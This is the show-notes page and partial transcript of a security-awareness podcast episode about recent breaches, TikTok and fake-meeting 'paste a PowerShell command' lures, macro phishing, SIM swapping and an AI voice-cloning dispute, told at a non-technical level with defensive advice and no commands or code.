These Old Cyber Tricks STILL Work?
What do Victoria’s Secret, TikTok, and a Scottish train station have in common?
They all feature in this week’s episode—alongside malware, fake IT calls, and a growing pile of breached data.
Episode 31 is full of weird, worrying, and very real cyber stories. Retailers are still getting hit. TikTok is spreading malware using AI-generated videos. SIM swap attacks are back. And a voice actor says her voice was cloned by ScotRail without permission. There's also a bit of good news—Microsoft and Apple are making some smart software updates that might actually help.
Let’s break it all down…
🛍️ Victoria’s Secret and Adidas – Different Attacks, Same Worry
Victoria’s Secret pulled down its entire US website after a security incident. Stores are still open, and the UK site is fine, but details are scarce. Meanwhile, Adidas confirmed that customer contact info was stolen via a third-party help desk. No credit cards were taken, but attackers now have names and email addresses—perfect for phishing.
The bigger trend? Help desks being socially engineered to reset passwords or provide access. It’s the same pattern we saw with MGM, M&S, and others. Social engineering is winning because it’s fast and it works. You don’t need zero-days when you can just ask someone nicely.
🎣 AI-Generated TikToks Are Now Spreading Malware
In a particularly grim twist, we found out this week that attackers are using TikTok to distribute info-stealing malware. The videos show fake software tips like “activate Microsoft Office” or “get Spotify Premium for free”—but they’re actually convincing users to open PowerShell and paste in malicious code.
One of these videos racked up half a million views.
This isn’t phishing in the traditional sense. There’s no dodgy link or email. Just a fake video and a bit of social engineering that hits people’s curiosity and FOMO. It’s especially dangerous on BYOD devices—because what gets installed at home could end up back on the corporate network.
📞 Google Meet Scam – Same Trick, New Platform
We also spotted a fake Google Meet error message asking users to “fix” their microphone by pressing Win+R and pasting in a command. It looks like Google Meet, but it’s a full clone, and the code gets copied to the clipboard automatically. You barely have to think. Just press, paste, and enter. And just like that, someone else has control of your device.
Same goes for fake Cloudflare verifications targeting WordPress admins and even a Coursera-themed phishing campaign that leads to a fake Facebook login page. It's all part of a wider trend: fewer links, more human behaviour tricks.
The lesson? If a webpage tells you to open PowerShell or press Win+R, don’t do it. Ever.
🔄 SIM Swap Scams Are Back (And Still Working)
This story came in from a listener—Oli spotted that someone he knows had been SIM swapped. They got a legitimate-looking message from EE confirming a new eSIM had been ordered, then a flurry of calls from an unknown number. They called EE, and yep—it had happened. Their mobile number had been reassigned, and SMS-based logins were no longer theirs.
It’s easy to forget just how much is tied to your phone number. SMS codes. Banking apps. Password resets. All it takes is one help desk that doesn’t ask the right questions. We talk about whether mobile providers should let users lock their SIM from porting—and why EE’s current process is nowhere near good enough.
🧠 The Awareness Angle – Tell People What’s Not Normal
This week’s awareness messaging is simple:
If a website or video asks you to open Run (Win+R), PowerShell, or paste in a command—walk away. It’s not normal. It’s never okay. Your IT team will never ask you to do this.
The same goes for weird login pages, especially if they’re offering something free, urgent, or exclusive. Encourage your users to pause and check before entering credentials or following instructions.
🎙️ ScotRail Voice Controversy – AI and Consent
Voice actor Gayanne Potter recorded some lines for accessibility tools back in 2021. This year, she discovered her voice had been turned into “Iona”—the new voice of ScotRail. She never gave permission for that. She’s spent two years trying to get it removed.
It’s a real-world version of the video we made last year—Likeness. It’s about how easily your identity can be used by an AI system once you've signed the wrong contract or clicked "agree" without reading. There’s currently no legal protection in the UK for voice or likeness. GDPR might not even apply if the company owns the original recordings.
This one’s a wake-up call for anyone working with audio, video, or their face and name online. Creators deserve more protection. And organisations using AI need to be upfront about how and why they’re doing it.
💰 Would You Sell Your Data for £40 a Month? Gen Z Might.
A new app called Verb.AI is paying Gen Zers $50 a month to track their scrolling, clicking, and buying. It builds a “digital twin” that companies can query like a chatbot to understand habits and preferences. It’s being sold as a fair value exchange. But is it?
Apparently, 88% of Gen Z are okay with sharing personal data if there’s compensation. And yet they’re also more likely than older generations to use encrypted messaging, block cookies, and browse privately. There's a tension here between knowing the risks and doing it anyway. And it’s something awareness teams need to understand.
The takeaway? Awareness isn’t just about teaching risk—it’s about helping people care. Especially when short-term rewards (like £40 a month) seem more tangible than long-term data consequences.
🔄 Smaller Bits Worth Your Time
-
WhatsApp is now offering passkey support for login—so you can ditch SMS codes and use fingerprint or face unlock instead.
-
Microsoft is building a new update orchestrator that will automatically patch all your drivers, apps, and system components in one go.
-
Apple’s switching to year-based naming for their OS updates—iOS 26, macOS 26, and so on—alongside a full redesign coming at WWDC.
🧠 The Awareness Angle – This Week’s Takeaways
Don’t Run Commands from Random Websites
That might sound obvious to security folks, but if TikTok videos and fake error messages are convincing thousands of people to paste code into PowerShell, we’ve still got work to do.
Tell Better Help Desk Stories
Attackers are getting in by calling IT. Seriously. The same way someone could walk into McDonald’s wearing a uniform and say “I work here now.” Teach your people to question unexpected requests, even from inside.
People Care About People, Not Protocols
£300 million lost. A cloned voice. A password on a post-it note. These are the kinds of details that stick. So make sure your awareness stories are human—not just technical.
🎙️ Quick Plugs
We’re up for Best Newcomer and Back to Basics at the European Cybersecurity Blogger Awards 2025. Results announced Wednesday 5th June at InfoSec Europe. Ant will be there—say hi if you’re around!
Don’t Miss It!
Our Awareness Angle Interview with Sara Carty from Unboring is out on Thursday.
It’s full of honest chat about drama school, storytelling, cyber marketing, and why we need to ditch blue, padlocks, and hoodie stock images.
Listen back—this one’s got loads for awareness pros.
Sign up for The Awareness Angle Newsletter today and get notified every time a new episode is released. Each newsletter contains details of the topics discussed and more from the world of Security Awareness.
You're almost there!
To confirm your subscription, please check your inbox for a confirmation email. Click the link in the email to complete your signup and start receiving our newsletter!
If you don’t see the email within a few minutes, check your spam or junk folder, just in case.
Thank you for subscribing!
📉 Victoria’s Secret Breach
Watch – https://youtu.be/XgogrdK_NvU?t=149
Read – https://www.bbc.co.uk/news/business-69081682
👟 Adidas Helpdesk Cyber Attack
Watch – https://youtu.be/XgogrdK_NvU?t=190
Read – https://www.bbc.co.uk/news/technology-69073785
📹 TikTok Malware via PowerShell Commands
Watch – https://youtu.be/XgogrdK_NvU?t=384
Read – https://www.infosecurity-magazine.com/news/ai-tiktok-infostealer-malware/
🪟 Microsoft’s Unified Update System
Watch – https://youtu.be/XgogrdK_NvU?t=523
Read – https://www.windowscentral.com/software-apps/windows-11/microsoft-is-working-on-a-unified-update-platform-to-keep-your-pc-up-to-date
🍎 Apple OS Rename: iOS 26 and macOS 26
Watch – https://youtu.be/XgogrdK_NvU?t=723
Read – https://9to5mac.com/2025/05/28/ios-26-name-change/
📄 Tajikistan Targeted via Word Macros
Watch – https://youtu.be/XgogrdK_NvU?t=847
Read – https://www.bleepingcomputer.com/news/security/russia-aligned-tag-110-targets-tajikistan-with-dotm-files/
☁️ Fake Cloudflare Verification Scam
Watch – https://youtu.be/XgogrdK_NvU?t=996
Read – https://www.wordfence.com/blog/2025/05/fake-cloudflare-page-malware/
🎥 Fake Google Meet PowerShell Attack
Watch – https://youtu.be/XgogrdK_NvU?t=1080
Read – https://www.cyware.com/news/new-phishing-scam-fake-google-meet-page-tricks-users-into-running-malware-67df4f27
🎓 Coursera/Meta Phishing Scam
Watch – https://youtu.be/XgogrdK_NvU?t=1214
Read – https://cofense.com/blog/fake-meta-certificates-coursera-phishing-campaign/
📱 SIM Swap Attack on EE
Watch – https://youtu.be/XgogrdK_NvU?t=2490
Read – https://community.ee.co.uk/t5/Mobile-Services/SIM-Swap-Scam-warning/m-p/1317527
💵 Gen Z Selling Their Data for $50/month
Watch – https://youtu.be/XgogrdK_NvU?t=2880
Read – https://www.fastcompany.com/91134124/gen-z-selling-personal-data-verb-app
🎙️ ScotRail AI Voice Controversy
Watch – https://youtu.be/XgogrdK_NvU?t=3133
Read – https://www.bbc.co.uk/news/uk-scotland-69085678
📜 T&Cs Tool – TOSDR.org
Watch – https://youtu.be/XgogrdK_NvU?t=3505
Read – https://tosdr.org/
🔐 WhatsApp Adds Passkey Support
Watch – https://youtu.be/XgogrdK_NvU?t=3660
Read – https://www.whatsapp.com/blog/passkeys-on-android
📧 Phishing Email Spoofing Luke
Watch – https://youtu.be/XgogrdK_NvU?t=3773
Missed the episode? Watch it below!
Transcript -
Anthony Davis (00:03.011)
Welcome to the awareness angle where we break down the latest cyber security stories and look at what they really mean for awareness, behaviour and staying safe. With me as always is my co-host Luke. Hello Luke.
Luke (00:17.29)
and everyone yeah well thank you
Anthony Davis (00:18.995)
How you doing?
Yeah, good good. It's a bit warm. It's it's it's kind of a muggy night It's a proper summery night here, or maybe it's just my carriage where I am is hot Yeah anyway this week underwear and sportswear get attacked Malware and fishing stories are everywhere. There's a chunk of those so we whizz through those And we've got loads of loads of cool stuff this week is that it's gonna be a good one So we'll break it down no jargon no drama
Luke (00:25.55)
you
Luke (00:29.144)
Yeah.
Anthony Davis (00:51.197)
just what you need to know, but just what you need to know, just what you need to know. But before we get running, this is of course an independent podcast. Our views are our own. So if we say something you don't like, we don't agree with, blame us. Don't blame the people that pay us for a living. So this is independent. All right, moving on really swiftly, European Cybersecurity Blogger Awards.
Voting is now closed. Thank you to everyone who has voted for us in the European Cyber Security Blog Awards 2025. We got nominated twice, Back to Basics Award and the Best Newcomer Award and I also got nominated as a contributor as well. So that's really cool. We find out Wednesday, this episode comes out Monday. Wednesday is the ceremony, so if you are at InfoSec Europe, get yourself.
to the Cyber 100 Club on Wednesday night. I'm gonna be there and we'll find out if we walk away victorious. We're up against loads of good established quality competition.
Luke (01:57.26)
Yeah, you're be there to collect free trophies.
Anthony Davis (02:00.418)
That'd be nice that'd be nice two would be handy because then we can have one each Yeah, yeah Yeah, anyway, that's if you're listening to this tune into the next episode to find out if you want anything Right, let's crack straight on with the news and A whole bunch of stories this week Retailers are still being hit
Luke (02:05.526)
Yeah, in the background.
Anthony Davis (02:29.082)
in the news, breaking news today as we record. is Victoria's Secret, the famous underwear retailer has taken down its US website after a security incident. Stores do remain open and the UK website is unaffected, so it's just the US website. Apparently they're working with third party experts, but that's all we know. Their share price has dropped as normally happens with these kind of things.
So yeah, if you shop with Victoria's Secrets in the US, you might want to change your password, make sure you've got 2FA and all of that. That's pretty much all we know. Yeah?
Luke (03:10.594)
Yeah, it falls onto the next one, which is the Adidas story. So, yeah, a couple days ago, this one was where Adidas disclosed that they've been hit as well by a cyber attack and customer personal information has been stolen from this. And it seems to be for a third party with their help desk, this sort of system, I believe it says. So anybody that's been in touch with that system has been affected and...
It says about that passwords and credit cards haven't been compromised. And they said that they're fully committed to protecting privacy and security of our consumers and sincerely regret any inconvenience or concern caused by the incident. And they posted that on the website on the 24th of May that was. So it's actually been a while ago, but that's all the thing that there is for this one.
Anthony Davis (04:04.816)
The trend here is help desk staff. I'm not saying that we should blame help desk staff, help desk staff, know, there's social engineering is the way forward. I'm actually reading about this on the register and Javad Malik, who's obviously at Know Before, is quoted as saying, while payment data wasn't compromised,
Theft of personal contact details poses risks for phishing and other social engineering attacks, so affected customers will need to be vigilant for any communications which appear to originate from Adidas. I'm gonna go one better than Javid and just say don't trust anything from anyone ever because everybody's getting breached. They might be breached before you even know it. just trust your gut on this one. If you get a strange message from someone, don't trust it.
Luke (04:44.898)
Yeah.
Luke (04:57.421)
Hmm.
Anthony Davis (04:59.11)
Yeah, it's at some point. This is mad, isn't it? it's just like dominoes. Yeah.
Luke (05:05.166)
every day now at the moment and I think the last episode or two we touched on about how Google said that they were pivoting to US companies but yeah it doesn't say there's a link between these but it's a little bit coincidence maybe
Anthony Davis (05:23.686)
The thing is right, now they know that that's a vector that works because it worked with MGM, it worked with co-op, it worked with &S. Socially engineering a help desk to reset a password means you get access without needing to compromise a system or service because you can just assume the identity of someone. It's like buying a uniform off eBay and turning up at McDonald's wearing a uniform. I'm new here. No one's gonna question you.
Luke (05:40.942)
Yeah.
Switch it if they're...
Yeah.
Luke (05:53.127)
especially if you're dated SMS codes and stuff like that.
Anthony Davis (05:59.025)
This is prime example. SMS, like companies that still have SMS as an authentication factor.
Luke (06:04.654)
or even just one time codes can be just as bad.
Anthony Davis (06:08.944)
Yeah, yeah Yes It's Yeah, what do we do? No doubt there'll be more next week No doubt Right i'll move on to the next one there'll probably be more about that later on in the show Next up tonight ai generated tiktok videos being used to distribute infosteel and mayware malware and
Luke (06:11.746)
Yeah.
Luke (06:16.718)
Yeah, I know.
Anthony Davis (06:38.546)
This is basically, there's video and there's some really basic advice about this, which we'll get to see. This is from Info Security Magazine. So TikTok, there's videos that are generated that are pushing out. And this doesn't depend on anything. This is entirely within TikTok. And they instruct users to execute PowerShell commands.
And these are like, you can activate Microsoft Office. You can activate Spotify without an account. Open up PowerShell, type this in. It's like, no. So it's basically tricking people thinking they're gonna get something cool and for free. Probably, it doesn't mention it, but it's exactly like, you can get Photoshop for free. Just open up PowerShell and type in this code. But what the code actually does is obviously give someone remote access to your machine or
download some in for stealing malware and they'll just scoop up all of your information. the message here for your people is if anyone or any system or any webpage tells you to open up PowerShell or press win and R, do not do it. It's quite simple.
Luke (07:55.402)
Yeah, I we touched on that recently as well didn't we? Somewhat that... running a command. Which I mean you'd hope people wouldn't have admin rights or maybe some cases it may not need it but... Well for home yeah, especially BYOD devices as well. Stealing all the work credentials at the same time.
Anthony Davis (07:59.344)
It did, yeah.
Anthony Davis (08:09.074)
Most home users will have admin rights though.
Yeah.
Anthony Davis (08:22.874)
Yes, so if you're on TikTok and it asks you to open up PowerShell or something, just don't do it. It's just not the good idea. If you're going somewhere you are unfamiliar with, probably like don't walk down any dark alleys. It's the same kind of feeling as that.
Luke (08:32.033)
No.
Luke (08:43.854)
Cool, the next story we've got is Microsoft now want to update all of your Windows software and drivers in one sort of automated, unified way. It's a new feature that's in private preview at the moment.
It's quite a technical sort of explanation but I guess essentially it's just about making everything smoother and taking less sort of a load on your PC of slowing you down whilst it's trying to download and potentially start installing updates in the background. It's just about making it a bit smarter with when it does this for you and can sort of get updates handled without you really realising, I guess, is the sort of idea and fewer pop-ups and stuff like that.
and hopefully yeah, guess the goal is to keep your system up to date more efficiently and quietly without interrupting you. I don't know. Yeah, I'm surprised it's not, I feel like it's already the thing, but I guess it's...
Anthony Davis (09:37.434)
I think this is a great thing. I have to be honest.
Anthony Davis (09:46.067)
I think it's a thing for some, it definitely never used to be a thing, and I think it is a thing for some drivers and software. But I look at my computer right now, right, and this Windows machine that I'm running this on, I've got the Intel driver and support assistant that has two updates available. I only know that because I noticed it earlier and I looked for it. These updates, it seems to always have updates available, but I've double clicked on it and it's just taken me to a dead page.
Luke (09:52.631)
Yeah.
Anthony Davis (10:15.934)
It's like, it's asking me to choose a product or search support, so it's not really working, but normally that's a Bluetooth driver and a Wi-Fi driver that seem to update quite frequently. Nvidia's the other one, there's always a driver there to install, but unless I notice the red dot or see a notification, I don't know.
Luke (10:25.218)
Yeah.
Luke (10:34.318)
Yeah, I think it says here as well about... obviously it's a Windows 11 feature and it says about for IT admins there's a consistent management plane and experience that's sort coming along with it. They call it like an orchestrator. Be interesting to see what that looks like.
Anthony Davis (10:53.596)
hadn't even considered, you said that, I hadn't even thought about that from a business perspective. That's even better. For all of the bad stuff Microsoft had done over the past few weeks with Copilot and that, this is a positive, I think.
Luke (11:03.683)
Yeah.
Luke (11:13.112)
Mm-hmm. Yeah, it seems to be in private preview. I don't know when it's coming out.
Anthony Davis (11:20.508)
The other place this could be good is when you've got those software packages like WinRAR or Audacity for example. Audacity is one that I've used on and off to do some audio editing or whatever. And every time I open it, it tells me that there's an update to install. Maybe I don't open it frequently enough and I'm following their update schedule. But unless I open it, it doesn't tell me that there's an update to install. And then if I open it, I wanna start using it, so maybe I'm like, I don't wanna.
Luke (11:38.872)
you
Anthony Davis (11:50.279)
do it now, I'll do it next time because I want to just get this done. So if it's updating in the background without me knowing and Windows is just handling that for me, thank you very much. Very, very nice.
Luke (11:52.75)
Yeah.
Luke (12:00.544)
and that sounds good.
Anthony Davis (12:03.152)
Hmm. Move it over to Apple now. And this is brilliant as well. Apple, when they launch the next version of iOS, MacOS, iPadOS. Okay, that's not good. When they launch the next version of their softwares, they're moving up numbers and they're gonna basically, the next one's gonna be called 26. So they're gonna reflect the year of release rather than the version.
Luke (12:33.166)
interesting choice.
Anthony Davis (12:34.374)
and that's going to carry on across the whole iOS, MacOS, iPadOS, WatchOS probably. So you'll know straight away how old your operating system is, which I think is quite nice. They're apparently to announce this at the Worldwide Developer Conference on June the 9th, designed to simplify branding and it's going to debut alongside
Luke (12:41.987)
there.
Anthony Davis (13:03.896)
redesigned user interfaces, codenamed Solarium. I have heard that the next version of, it's a big redesign this time, like there's been one big redesign, I think, in the history of iPhone, I think there's been one significant change, and I think this is the next significant change, so.
Luke (13:25.112)
Yeah, it's interesting.
Anthony Davis (13:27.154)
We'll find out. there's Vision OS as well. I forgot about Apple Vision. There's Vision OS. Right. Well, they're the big news stories.
Luke (13:32.332)
Mmm.
Anthony Davis (13:41.585)
I've got five more news stories, but they all kind of compliment each other. This week, I noticed a massive abundance of phishing and scam related stuff that was all kind of, none of it made the headlines, but these are all really valuable stuff that awareness professionals and cyber professionals probably need to be aware of. So I can start with the first one, which is,
Russia align tag 110 targets Tajikistan. So the nation of Tajikistan has been targeted using phishing attacks. But the interesting thing with this is that they're word template files. So they've specifically targeted the government of Tajikistan, Tajikistan with macro enabled word documents. So,
If like the takeaway on this, I don't need to say anymore on this. Why do you need to receive DO, what are they? It's a really technical document. Why do you need to receive DOTM files by email? You probably don't. So block it, right? If just go to whoever manages your email gateway and just say any attachments that are dot DOTM, we?
Luke (14:46.176)
Mm-hmm.
Luke (14:59.276)
No.
Anthony Davis (15:10.65)
Add them to quarantine or get rid of it. Because you probably don't need to be receiving them.
Luke (15:12.865)
Yeah.
Luke (15:16.96)
interesting the macros are never going away it seems.
Anthony Davis (15:20.814)
No, no, and there's, we'll put a link to this in the newsletter and stuff, but there's a very, very technical coverage of this. I just thought it was funny, like the old techniques. You know, what decade is this? We're still word, macro enabled word files. Yeah, we've been talking about that for as long as I've been doing awareness. That's been a threat vector, so.
Luke (15:31.918)
Mm-hmm.
Luke (15:40.738)
Yeah, flat Excel macros as well. Word templates is a of a new one to me.
Anthony Davis (15:44.86)
Yeah
Anthony Davis (15:49.233)
Yeah, and I get that in some organizations, there's like some large organizations are held up by very old Excel spreadsheets running macros. And I get that that's the thing, but you don't need to receive them. Like you need macros enabled maybe, but you don't need to be receiving them via email. no. Well, there's the layers, isn't it? Like number one, we do email them around. Right, but do they come from...
Luke (16:09.88)
not from external people anyway
Anthony Davis (16:18.694)
Outside domains, no. So there's one way to block it. Do you have to share them via email? Could you share them via Slack or Teams or something or SharePoint? You know, there's another way to look at it. Yeah.
Anthony Davis (16:36.156)
The next one I saw, and this is something we've covered before, similar, so fake CloudFlare verifications. You know when you sign into something and you get the CloudFlare box that says, verify you are human. So apparently, and this leads on to what I've just said previously, this is targeting WordPress sites, and it essentially tricks victims into following a set of commands.
when you click on the CloudFlare box, it then asks you to press Win plus R to open run and then asks you to copy and paste a command in. And this is something we've spoken about ages ago. So we don't really need, CloudFlare will not ever tell you to do this. So make your people aware that this is what good behavior looks like and this is what bad behavior looks like.
Luke (17:36.322)
Yeah.
Anthony Davis (17:37.01)
Cloudflare asking you to paste code into a run box is not expected behaviour.
Luke (17:44.846)
Yeah.
Anthony Davis (17:49.17)
Do you want the next one? I told you I'd whisk through these.
Luke (17:51.566)
It seems like the same sort of thing with a PowerShell malware tricking users into running it.
Anthony Davis (17:55.268)
I just...
Anthony Davis (18:00.273)
Google Meet, it's essentially a fake Google Meet page and it doesn't present a login form but it's again saying microphone permission denied and it asks you to copy and paste a PowerShell command. There's another one, the screenshot on this one says you can't join the meeting, try fix and the try fix will tell you to paste a command.
Luke (18:19.022)
That's incredible.
Anthony Davis (18:30.96)
It says Windows key and R, then Control and V. the webpage, this is the clever thing. The webpage automatically copies the code to the clipboard. So it's there. So you haven't got to highlight anything. I don't want to bombard you with screenshots, but let me just show you this one, because this one's quite telling. Let me just pull this up. If you are listening to this, don't forget you can, of course.
Luke (18:41.293)
Right.
Click on the button there.
Anthony Davis (18:59.334)
watch us on YouTube and then see the screenshots in all their glory. So you can see here, this looks like Google Meet and it says can't join the meeting, press Windows key R then Control and V and finally press Enter. At which point it's too late. You're like, that's game over.
Luke (19:15.009)
Yeah.
It's quite a tricky bit of a trick isn't it really? The run window appears in the bottom left so you almost could do it without really looking and if you're not a proficient Windows user you might not know what Windows R does and then you've done it.
Anthony Davis (19:33.434)
Again, hadn't thought of that, but yeah. Like I've just pressed WinR and you can barely notice it down in the bottom left hand corner because it doesn't come up front and centre. Maybe that's one way that Microsoft maybe should change because that's always been tucked in the bottom left hand corner. Like every bit.
Luke (19:54.136)
probably should ask you, are you sure you want to run this command? Maybe there's a way doing that.
Anthony Davis (19:58.011)
That would be nice. That would be nice. Yeah. Maybe, maybe it has, maybe Windows should have some built in sandbox to tell you like this command is going to do this. Do you want to run this command?
Luke (20:06.958)
Hehehe.
Luke (20:11.48)
Yeah.
Anthony Davis (20:14.514)
So that was that one. The next one. So Coursera. And this was a post I saw from Fishme this week. And this is basically three courses being offered on Coursera, which is a training platform like Udemy. And you get an email and it says,
Coursera team is from the Coursera team with a subject that translates to get your free meta certificate in social media marketing now And this has come from like the sender address doesn't match the Coursera domain obviously And then when you click on it it asks you to sign up into Facebook And then when you click the continue with Facebook button
it doesn't actually take you to Facebook. It takes you to a fake Facebook login page. And the domain isn't facebook.com. The domain is the phishing, the same domain. And it just takes you to a fake Facebook login page.
Luke (21:17.538)
Hmm.
Anthony Davis (21:23.538)
Yeah, it's again something free unfamiliar domains
Luke (21:31.596)
Yeah, last thing to log in with your plane credentials like that.
Anthony Davis (21:31.858)
It's just not great.
Anthony Davis (21:37.211)
Yeah, it's, I mean, if you're using Facebook in this day and age and you haven't got multi-factor authentication enabled, that's one thing you should be telling your people. Go to Facebook, do a lovely little campaign on how to set up. We did one years ago where we basically took like the five or six big social media platforms and we gave instructions of how to configure 2FA on those accounts.
Luke (22:05.602)
Yeah.
Anthony Davis (22:06.31)
doesn't take people long and it's really easy to do. You could almost do one a week or one if you do a bi-weekly newsletter. This week we're going to tell you how to secure your Facebook account. There's some free content, right? If you're looking for things to talk about.
Luke (22:17.741)
Yeah.
just thinking as well as we touched on previously with pass keys now you can probably well I just googled it but a lot of these platforms support pass keys now but it seems that Facebook may not be available to everybody it says and they only really talk about on an iPhone but it's worth maybe looking at switching to pass keys for some of these platforms
Anthony Davis (22:46.81)
I wonder if, I remember this being a problem with, because the iPhone was the first to properly do Face ID, because they own the whole ecosystem. And Android didn't do Face ID because it doesn't have the LiDAR camera. Not all of them do. I mean, you remember a time when a fingerprint reader was a new thing on a mobile phone.
Luke (23:06.924)
Yeah.
Luke (23:15.054)
Mm.
Anthony Davis (23:16.24)
Yeah, that's interesting.
Right, that's enough of those, because we've got fake phishing pages, we've got Google Meet. Tell your people, these are great examples. It's clearly working. People are clearly falling for this, because if they didn't, they wouldn't build them, right? People are doing this because it works. So you need to tell your people, if a webpage asks you to press Win R, walk away, close it, don't do it.
this is like nothing good. There's no legitimate reason that a webpage should tell a user to run a command in a run box. There just isn't. In all my years, I'd never needed to do that from an instruction from a webpage. And I rarely need to do that now. It's only, yeah, like going back to help desk. You wanna get into task manager or services or something like that, or your task bar's frozen or disappeared. That's the only
Luke (23:58.146)
No.
Luke (24:06.338)
Not you're trying to fix something on your computer, but yeah.
Luke (24:18.67)
You
Anthony Davis (24:19.846)
That's the last time I ran it I think when my start menu crashed But that's because I was doing funky things with my computer. There's no legitimate reason to run Commands to paste commands into a run box as instructed by a web page. So you need to tell your people that
Luke (24:24.003)
Yeah.
Luke (24:37.11)
Definitely.
Anthony Davis (24:38.802)
We'll put links to all of those in the newsletter. The newsletter is available every week alongside every single episode and it contains links and details of all of the stories that we discuss every week. We have over 600 subscribers now. That number's going up week on week, which is amazing, thank you. Yeah, it's brilliant. So 600 subscribers to the news, more than 600 subscribers to the newsletter. And it's free.
Luke (24:56.494)
That's incredible.
Anthony Davis (25:07.58)
comes out every week, can get it in your inbox by going to riskycreative.com. You can sign up there. Or you can get it on LinkedIn. That's where most people get it. So you can search on LinkedIn for the awareness angle. And that's available on LinkedIn. Or me, 612 subscribers we have at the moment on LinkedIn. And we've got more on email. that's awesome.
Luke (25:26.828)
No, that's great.
Luke (25:30.99)
And that's where all the good stuff is in the newsletter after we've had time to think about what we've said in the episode and write it down in a better way.
Anthony Davis (25:35.25)
all the good stuff.
Anthony Davis (25:40.179)
That's where the really valuable awareness angles are because we've had time to chew it over and we've talked about it and then we come out the other side. It's like why didn't I say that? Yes, and don't underestimate it like Doing the video we record this and then Luke goes away and makes it look and sound great which is an art in itself and Then we'll go away and do the newsletter as well. And it's yeah, it's a lot of work, but we do it because we love doing it so
Luke (25:46.99)
Yeah
Anthony Davis (26:09.584)
Don't forget as well if you see a story that you want to talk to us about or you want think we should consider on the show reach out We've got people that do Hayden that know before reaches out every couple of weeks with something and Now Oli at Tesco reaches out quite often as well. So I've got something from him a little later. So Yeah, reach out get in touch. Hello at risky creative comm or message Luke or message me on LinkedIn Right awareness awareness
Luke (26:29.272)
That's good.
Anthony Davis (26:39.078)
cooking on gas this week this is good
Luke (26:40.952)
You
Anthony Davis (26:43.002)
This week is of course Info Security Europe. He's on at Excel in London, Tuesday, Wednesday and Thursday I think. It's like, this is the big one. We've been to some others but this is normally the big one. And I'm gonna be there Wednesday, might be there Tuesday as well. So if you're about, keep an eye out, give us a shout and come and say hello.
I might do a bit of filming, might say hi to a few people and I might bring something to next week's episode. I might do, no promises. And of course, Wednesday at the Cyber 100 Club is when we find out if we are winners or losers, so.
Yeah. If you're going to be in SEC Europe this week and you want to reach out or you want to meet up, give us a shout.
Luke (27:31.886)
as I was
Anthony Davis (27:41.667)
Next in two weeks time The future of cyber security virtual conference. I am speaking. I've got a little slot I've got a great little story to tell about awareness and storytelling But I'm just a warm-up act. We've got Lee Morton. We've got Holly Foxcroft and Then headlining is the man that saved the internet Marcus Hutchins Obviously, he's the man that stopped wanna cry from happening. So
Yeah, it's gonna be a great event. It's virtual. You can sit at home comfortable or at your desk with your headphones on and listen to it. It's gonna be good. So that's on the 12th of June. Details of how to attend and register are of course in the newsletter.
Luke (28:19.182)
yeah.
on to.
Luke (28:28.302)
once it's on up full.
Anthony Davis (28:33.08)
Right, comments. I haven't prepared anything this week. Let me just dive on there and see if there's anything. I haven't posted loads this week, I have to be honest. It's been a very, very busy week for me. But last week we did cover, we covered a section on old versions of Windows. We talked about Windows XP that was still in use in a hospital lift and ATM machines.
Luke (28:40.27)
Thank
Luke (28:59.811)
Mm-hmm.
Anthony Davis (29:00.764)
We've got a couple of comments on those. Someone says, they went on a farmer site that still use the old PCs they used in the Cold War. Skarder is like an old teletext.
Luke (29:15.891)
Anthony Davis (29:16.956)
That's secure by obscurity, surely. Someone says, maybe it's okay to use old computers if it works. This is just American consumerism conning us to use new versions that add nothing useful.
Anthony Davis (29:37.446)
Okay. Yeah.
Let's leave the comments there for this week.
Luke (29:43.519)
Hehehe
Anthony Davis (29:45.445)
Right, let's talk about interviews really quickly and then we'll get back to some more interesting topics. We obviously, the interview we released week and a half ago with Amy from the Cyber Escape Room Co. That's really good interview, really fun interview. If you've ever wondered if a cyber escape room is for you, listen to it and you'll probably decide it is, because that's, I changed my opinion.
But this Thursday, we release these episodes every two weeks, every other Thursday, say on the same feed. So if you're listening to this on a podcast or on YouTube, there will be interview episodes in there. This Thursday, we released an episode and I chatted with Sarah Carty from Unboring. They're a marketing agency on a mission to make cybersecurity unboring.
We talk about drama school, cyber espionage, which is quite interesting. But essentially we also talked about how awareness and marketing, we're fighting the same battle, right? We're trying to get people to care and actually engage. So this is, it's good. We talk about how blue, and I realize we use a lot of blue, but how blue and padlocks and hoodies are probably like.
out now. Maybe they still have a place but largely we should stop using hackers in hoodies and padlocks. And we also have a bit of a moan about AI powered as a buzzword and as a phrase. So it's a good conversation. It's about doing things differently, thinking outside the box. So yeah, it's worth listening. That'll be out this Thursday. So keep your eyes peeled wherever you get your podcasts or your YouTubes.
Luke (31:34.766)
Mm.
Luke (31:43.822)
Sounds like a really fun one to watch and useful for standing out.
Anthony Davis (31:45.809)
Yeah, yeah. We've got a few of these in the bag now over the next few weeks. There's there's there's been so many good conversations, like really constructive conversations. really maybe I'm not the best interviewer, but the people and the conversations are around topics that are really relevant and interesting. So it should be good. Should be good.
Right, next tonight, let's get onto some topics. So I've got a few topics that I'm bringing this week and I just wanna show you. I'm gonna just share my screen for a second. So this was something that was shared with me earlier this week. And this is a website called digital.lead. Digital.lead.org.uk. And it's a personal digital safety checklist.
I haven't really played with this, but I thought I'd bring it, because it's a really nice looking dashboard, right? And I thought maybe we'd do little bit of this together. So at the top of the screen it says, your personal digital safety checklist, your guide to securing your digital life and protecting your privacy. Now let's just bear in mind, if you're a security awareness professional, October is Cybersecurity Awareness Month. And the theme has been the theme for the past couple of years, I think, is secure your
world, so this could be a great thing to push for that. So, I'm gonna click on authentication. This is just tick boxes, and there's a lot of words. So at the top it talks about most reported data breaches are caused by the use of weak, stolen passwords, use long, strong, and unique passwords. So here, use a strong password. You can tick the box to say, yep. Don't reuse passwords. You can tick the box and say, yep.
Save your passwords into the browser. Essential.
Anthony Davis (33:44.86)
Okay, avoid sharing passwords. Tick, enable two factor authentication. Tick, keep backup codes safe. Tick.
Anthony Davis (33:55.823)
I I have to, let's ignore that one. Brilliant, so that's authentication done. I can't get back. I think I found a flaw in the website. How do I, do I have to tick?
Anthony Davis (34:13.786)
Okay, so I think the web, no, maybe I can go checklist. Okay, slight user experience flaw there.
Luke (34:19.18)
Maybe some tweaks that needed.
Anthony Davis (34:23.056)
So look, maybe there's some flaws on this website, but this could be really good for inspiration. If you don't wanna push this site out itself, you might wanna build your own if you've got a team that are kind of savvy. But this is quite good for inspiration because it gives some nice, there's a chunk, 59 items here. There's 59 secure behaviors here that you can market to your people really easily.
Luke (34:33.123)
Mm.
Anthony Davis (34:52.498)
If I click on email, have more than one email address. Consider using one email address for important accounts and a different address for less important stuff. It's not bad advice, maybe not everyone would do that.
